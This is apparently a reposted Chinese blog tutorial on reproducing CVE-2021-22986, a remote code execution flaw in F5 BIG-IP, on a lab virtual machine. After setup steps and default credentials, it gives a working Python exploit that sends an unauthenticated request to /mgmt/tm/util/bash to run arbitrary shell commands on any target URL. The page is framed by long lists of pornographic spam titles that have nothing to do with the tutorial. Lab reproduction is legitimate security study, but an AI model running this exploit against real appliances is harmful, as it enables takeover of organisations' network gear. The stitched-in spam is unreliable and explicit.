日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

發布時間:2025/4/5 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、在vmware上安裝BIGIP-15.1.0

進入F5官方主頁:https://support.f5.com/csp/home
點擊下載按鈕(如下圖所示)

進入頁面后,我們選擇v15.X版本

選擇15.1.0長期維護版本

在這里,我們選擇虛擬化版本

點擊我接受按鈕

選擇第一個下載

下載完成之后,我們將下載下來的ova文件拖動到虛擬機當中,即可完成虛擬機的安裝

二、BIGIP虛擬機的初始使用

虛擬機登陸
虛擬機裝好后 默認的用戶名是 root,密碼是default.
個別用戶登陸后,會強制要求更換密碼。這里更換的密碼不能是一些常用的字符組合(比如單詞)否則很容易不通過。如果您失敗了幾次,不妨嘗試類似于f8fa7g4k3k69o這樣的密碼。
遠程web登陸
虛擬機root登陸成功后,通過ifconfig命令獲取ip地址(虛擬機要橋接模式哦),假設這里獲取的ip為10.0.0.166, 那么在host主機訪問這個網址,進入web配置頁面


web遠程登陸的用戶名和密碼都是admin,但是我在登陸的時候密碼始終不對,最后,我只好重置這個密碼(如下圖,輸入兩遍新密碼)

終于,在重置密碼后,我web遠程登陸成功了

license激活
接下來,我們點擊license按鈕(我這里是激活過的)

如果不是已激活的狀態,需要進入官網:(http://www.f5.com/trial)來獲取激活碼
流程如圖所示,選擇紅色框框選中的按鈕

點擊Get started按鈕

填寫你的申請信息(官網要登陸哦)

稍后,會在半個小時內,將激活碼發送到您的郵箱里面(郵箱是官網賬號注冊時留的郵箱)
我們收到激活碼后填寫到下面的Base Registration Key欄中,然后選擇Automatic模式進行激活(因為本人激活過了,所以下圖是在網上找的,網上的那個人選擇的是第二個,這里我實際操作選擇的是第一個)

然后點擊Next按鈕,如果出現下一步或者我接受之類的按鈕一律點擊即可
之后一般會自動跳轉到如下圖所示的界面,這就代表激活成功了

三、遠程代碼執行命令

執行代碼

import requests import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning)def attack(target_url, command="pwd"):command = f"\'{command}\'"check_url = target_url + '/mgmt/tm/util/bash'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",'Content-Type': 'application/json','X-F5-Auth-Token': '','Authorization': 'Basic YWRtaW46QVNhc1M='}data = {'command': "run",'utilCmdArgs':f"-c {command}"}try:response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)if response.status_code == 200 and 'commandResult' in response.text:print(" {} 存在漏洞".format(target_url))attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)return attack_resultelse:print("{} 不存在漏洞".format(target_url))except Exception as e:print('url 訪問異常 {}'.format(target_url))def format_url(url):try:if url[:4] != "http":url = "https://" + urlurl = url.strip()return urlexcept Exception as e:print('URL 錯誤 {}'.format(url))if __name__ == '__main__':# 你的虛擬機ip地址ip = "your ip"# 執行的命令command = "ls"url = format_url(ip)# 輸出返回結果print(attack(url, command)) 上面的代碼用戶使用的時候,只需要將ip 改成您虛擬機的ip即可,其余無需改變

執行結果展示

  • 查看當前路徑
  • 查看當前路徑下的文件

    3.創建一個目錄

    到虛擬機中,我們查看目錄是否創建成功

  • 可以看到目錄創建成功

    總結

    以上是生活随笔為你收集整理的F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 成人黄色在线免费观看 | 草草影院国产 | 国产精品一区二区三 | 国产小视频在线看 | 色香影视 | 欧美精品1| 国产男女猛烈无遮挡免费观看网站 | 国语对白做受按摩的注意事项 | 欧美视频色 | 亚洲一区高清 | 欧美色妞网 | 国产乱码精品一区二区三区亚洲人 | 精品久久久久久无码中文野结衣 | 在线观看污 | 国产淫片av片久久久久久 | 91网址入口 | 一本色道久久综合亚洲精品酒店 | 杨幂一区二区三区免费看视频 | 一区二区在线免费 | 日韩a在线| 国产精品高潮呻吟久久久 | 中文字幕15页 | 最新国产中文字幕 | 女女互磨互喷水高潮les呻吟 | 精品一区二区三区日韩 | 日本一区视频在线观看 | 亚洲av成人精品毛片 | 四虎视频国产精品免费 | 国产精品无码久久久久久电影 | 激情小说视频在线 | 国产精品外围 | 国产理论精品 | 久久久久久不卡 | 成人网站在线进入爽爽爽 | 福利小视频在线播放 | 涩涩视频在线免费看 | 国产叼嘿视频 | 视频区小说区图片区 | 全部毛片永久免费看 | 美女色诱男人激情视频 | 丰满少妇被猛烈进入高清播放 | 日本人的性生活视频 | 久久99热精品 | 青青草香蕉| 亚洲自拍图片 | 亚洲小说区图片区都市 | 女生喷水视频 | 福利国产视频 | 靠逼视频免费网站 | 97超碰碰 | 中文国语毛片高清视频 | 亚欧美在线观看 | 日韩av在线看免费观看 | 国产免费观看一区 | 波多野结衣av无码 | 国产激情在线视频 | 一区二区三区在线观 | 久久在线观看 | 四虎一区二区 | 日本啊啊视频 | 亚洲乱码国产乱码精品天美传媒 | 加勒比波多野结衣 | 黄色国产精品 | 91成人免费在线视频 | 国产5区 | 亚洲是色| 日日艹| 国产三级国产精品国产专区50 | 亚洲啪啪网址 | 日日摸夜夜添狠狠添久久精品成人 | 午夜精品久久久久久久99老熟妇 | 日本一本一道 | 国产三级日本三级在线播放 | 五月婷婷丁香 | 超碰在线最新地址 | 色久视频 | 一区二区免费 | 成人网色 | 国产综合区 | 韩国av免费在线 | 中国老熟女重囗味hdxx | 强伦轩人妻一区二区电影 | 国产不卡视频 | 最近的中文字幕 | 毛片大片 | 一区视频网站 | 日韩av中文字幕在线播放 | 99国产视频在线 | 欧美成人h | 中文写幕一区二区三区免费观成熟 | 日韩一级av毛片 | 麻豆精品a∨在线观看 | 自拍偷拍99 | 色在线视频 | 国产理论影院 | 国产又黄又粗又猛又爽的视频 | 色综合天天综合网天天狠天天 | 在线免费观看黄色小视频 | 女~淫辱の触手3d动漫 |